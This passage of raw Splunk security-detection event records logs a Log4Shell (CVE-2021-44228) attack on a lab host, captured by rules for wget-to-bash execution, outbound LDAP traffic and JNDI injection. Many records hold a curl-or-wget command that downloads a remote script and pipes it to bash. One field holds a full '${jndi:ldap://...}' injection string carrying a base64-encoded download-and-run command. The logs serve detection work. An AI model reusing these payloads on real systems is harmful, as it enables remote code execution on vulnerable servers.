Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643353, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="Actions on Objectives", annotations._all="PR.DS", annotations._all="T1190", annotations._all="PR.PT", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="CVE-2021-44228", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643351, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CIS 16", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Stage:Execution", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643353, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="Actions on Objectives", annotations._all="PR.DS", annotations._all="T1190", annotations._all="PR.PT", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="CVE-2021-44228", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643351, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CIS 16", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Stage:Execution", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via 